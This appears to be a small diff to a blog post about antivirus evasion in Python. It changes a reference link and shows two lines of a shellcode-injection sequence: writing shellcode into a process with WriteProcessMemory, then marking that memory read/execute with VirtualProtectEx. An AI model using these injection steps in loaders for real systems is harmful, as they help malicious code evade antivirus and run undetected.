m1kemu/m1kemu.github.io/_posts/2020-05-07-python-av-evasion.md

 result = WriteProcessMemory(handle, memptr, sc, len(sc), 0)
 ```

-Change protection of the allocated memory region to Read/Execute ([Reference](https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants)).
+Change protection of the allocated memory region to Read/Execute (see: https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants).
 There is no need for the Write attribute since we've already written the shellcode to this region.
 ```
 result = VirtualProtectEx(handle, memptr, len(sc), 0x20, 0)
 ```